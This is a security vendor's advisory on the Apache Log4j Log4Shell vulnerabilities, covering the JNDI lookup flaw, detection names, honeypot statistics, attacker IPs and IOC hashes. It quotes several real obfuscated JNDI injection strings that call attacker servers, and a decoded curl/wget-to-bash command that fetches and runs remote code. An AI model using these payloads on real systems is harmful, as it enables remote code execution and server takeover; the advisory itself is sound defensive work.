Incidents

CVE-2021-44228 vulnerability in Apache Log4j library

Updated 2021-12-20

CVE-2021-44228 and CVE-2021-45046 summary

A couple of weeks ago information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publicly published Proof-of-Concept, as well as the vulnerability’s easy exploitability, make this situation particularly dangerous.

Some time later researchers reported another vulnerability assigned to CVE-2021-45046. Initial reports said that it can cause Denial of Service (DoS) and only specific non-default configurations are vulnerable, thus its severity was set to low value of 3.7 points. However, a bit later it was increased to 9.0 because in some cases attacks based on this vulnerability can lead to remote code execution (RCE).

Kaspersky is aware of PoCs in the public domain and of the possible exploitation of CVE-2021-44228 and CVE-2021-45046 by cybercriminals. Our products protect against attacks leveraging both vulnerabilities, including PoC usage. Possible detection names are:

  • UMIDS:Intrusion.Generic.CVE-2021-45046.*
  • UMIDS:Intrusion.Generic.CVE-2021-44228.*
  • PDM:Exploit.Win32.Generic

KATA verdicts:

  • Exploit.CVE-2021-44228.TCP.C&C
  • Exploit.CVE-2021-44228.HTTP.C&C
  • Exploit.CVE-2021-44228.UDP.C&C

Geography of CVE-2021-44228 and CVE-2021-45046 scan and exploitation attempts, December 2021 (download)

CVE-2021-44228 and CVE-2021-45046 technical details

The remote code execution vulnerability CVE-2021-44228 was found in the Apache Log4j library, a part of the Apache Logging Project. If a product uses a vulnerable version of this library with the JNDI module for logging purposes, there is a high possibility that this vulnerability can be exploited. Almost all versions of Log4j are vulnerable, from 2.0-beta9 to 2.14.1.
Log4j includes a Lookup mechanism that could be used to make requests through special syntax in a format string. For example, it can be used to request various parameters such as the version of the Java environment via ${java:version}, etc. Then, by specifying the jndi key in the string, the Lookup mechanism uses JNDI API. By default, all requests are done using the prefix java:comp/env/; however, the authors implemented the option of using a custom prefix by means of a colon symbol in the key. This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols, such as LDAPS, DNS and RMI, can also be used.

Kaspersky has been monitoring telemetry related to exploitation of CVE-2021-44228 vulnerability, successfully extracting the URLs used by the attackers. Noteworthy examples can be found below.
${jndi%3aldap%3a//0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName:user:env}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh[.]com}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYuOTIuMjI5OjgwKXxiYXNo}
${jndi:ldap://5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//62.182.80.168:1389/pien3m}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}://67.205.191.102:1389/koejir}}

Analysis of the URLs showed how the attackers tried to insert the payload in uncommon fields, such as User-Agent, the data field, and the URI parameter. This is an example of an evasion technique aimed at bypassing simple blocking measures applied by many companies to protect against this kind of attacks.

The following excerpt shows an exploitation attempt as displayed in HTTP server logs.
45.155.205[.]233:53590 server:80 - [10/Dec/2021:13:25:10 +0000] "GET / HTTP/1.1" 200 1671 "-" "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/[BASE64-code-removed]}"

The base64 string in the request above decodes to:
(curl -s 45.155.xxx.xxx:5874/server:80||wget -q -O- 45.155.xxx.xxx:5874/server:80)|bash
The code fetches a malicious script from 45.155.xxx.xxx and subsequently runs it using Bash.

Thus, an attacker-controlled remote server could return some object to a vulnerable server, potentially leading to arbitrary code execution in the system or to leakage of confidential data. All an attacker should do is send a special string through the mechanism that writes this string to a log file and is therefore handled by the Log4j library. This can be done with simple HTTP requests, for example, ones sent through web forms, data fields, etc, or with any other kind of interactions that use server-side logging.

CVE-2021-45046 is caused by an another issue related to Thread Context functionality. It allows a programmer to assign values for multiple attributes at once and then substitute them in messages using special syntax. If a product use non-default Pattern Layouts with a Context Lookup, for example, ${ctx:username}, then an attacker that controls this username can do a recursive lookup that leads to stack overflow error and cause Denial of Service (DoS). In other situations with some specific configuration it may even cause a remote code execution (RCE). Unfortunately, mitigations related to formatMsgNoLookups and noFormatMsgLookup that were introduced to fix of previous vulnerability doesn’t prevent a new one.

CVE-2021-44228 exploitation statistics

Data originating from our honeypots shows a total of 8646 exploitation attempts between December 10th and December 12th, with peak activity occurring on December 11th at 12:00 GMT at an hourly rate of 1700 malicious requests.

log4j exploitation attempts per hour, December 10th through 12th

Below are the TOP 10 most active attacker IPs we have observed so far.

Source IP Country Total number of requests
147.182.131[.]229 USA 948
147.182.215[.]36 USA 789
137.184.28[.]58 USA 693
195.54.160[.]149 Russia 201
45.155.205[.]233 Germany 182
5.157.38[.]50 Sweden 134
46.105.95[.]220 France 108
131.100.148[.]7 Brazil 104
113.141.64[.]14 China 103
221.228.87[.]37 China 83

We observed malicious requests coming to our honeypots from across the globe, with the most requests being made from the countries in the table below.

Country Total number of requests
United States 1284
China 623
Germany 602
United Kingdom 497
Canada 477
Netherlands 476
Singapore 449
France 420
Australia 403
Japan 372

The systems most affected by mass scanning activity and attempts to leverage the exploit code were as follows.

ASN Total number of requests
DIGITALOCEAN-ASN 1612
M247 Ltd 1190
OOO Network of data-centers Selectel 833
GOOGLE 736
Host Universal Pty Ltd 547
Gigabit Hosting Sdn Bhd 316
Hydra Communications Ltd 247
Event Zero 239
PERFORMIVE 228
Intertelecom Ltd 196

Mitigations for CVE-2021-44228 and CVE-2021-45046

Affected Kaspersky products

Supported Kaspersky products are not affected by the CVE-2021-44228 or CVE-2021-45046 vulnerabilities.

Indicators of compromise (IOC)

1cf9b0571decff5303ee9fe3c98bb1f1
194db367fbb403a78d63818c3168a355
18cc66e29a7bc435a316d9c292c45cc6
1780d9aaf4c048ad99fa93b60777e3f9
163e03b99c8cb2c71319a737932e9551

CVE-2021-44228 vulnerability in Apache Log4j library

Your email address will not be published.

 

  1. Evans

    Very informative.Thank you

  2. 0x0

    Thanks for the share this is good and very detailed keep it up.

  3. Elamparithi P

    When the fix will be available? If any fix came, please let us know soon.

Reports

APT trends report Q1 2022

This is our latest summary of advanced persistent threat (APT) activity, focusing on events that we observed during Q1 2022.

Lazarus Trojanized DeFi app for delivering malware

We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, but also implants a full-featured backdoor.

MoonBounce: the dark side of UEFI firmware

At the end of 2021, we inspected UEFI firmware that was tampered with to embed a malicious code we dub MoonBounce. In this report we describe how the MoonBounce implant works and how it is connected to APT41.

Subscribe to our weekly e-mails

The hottest research right in your inbox